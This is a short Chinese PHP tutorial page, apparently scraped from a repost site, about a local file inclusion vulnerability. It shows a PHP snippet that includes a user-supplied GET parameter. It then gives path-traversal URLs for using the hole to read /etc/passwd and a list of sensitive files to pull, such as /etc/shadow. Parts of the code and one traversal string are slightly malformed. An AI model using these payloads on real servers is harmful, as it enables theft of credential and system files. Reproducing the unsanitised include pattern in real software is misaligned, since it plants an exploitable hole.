php 伪造本地文件包含漏洞的代码_PHP教程

WBOY
풀어 주다: 2016-07-21 15:23:40
원래의
1039명이 탐색했습니다.

代码:

复制代码 代码如下:

$page=$_GET['page'];
include($page.'php');
?>

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach

www.bkjia.comtruehttp://www.bkjia.com/PHPjc/324439.htmlTechArticle代码: 复制代码 代码如下: ?php $page=$_GET['page']; include($page.'php'); ? 你可以这样使用 http://www.xxx.com/index.php?page=../etc/passwd http://www.xxx.com/index.p...
원천:php.cn
본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
인기 튜토리얼
더>
최신 다운로드
더>
웹 효과
웹사이트 소스 코드
웹사이트 자료
프론트엔드 템플릿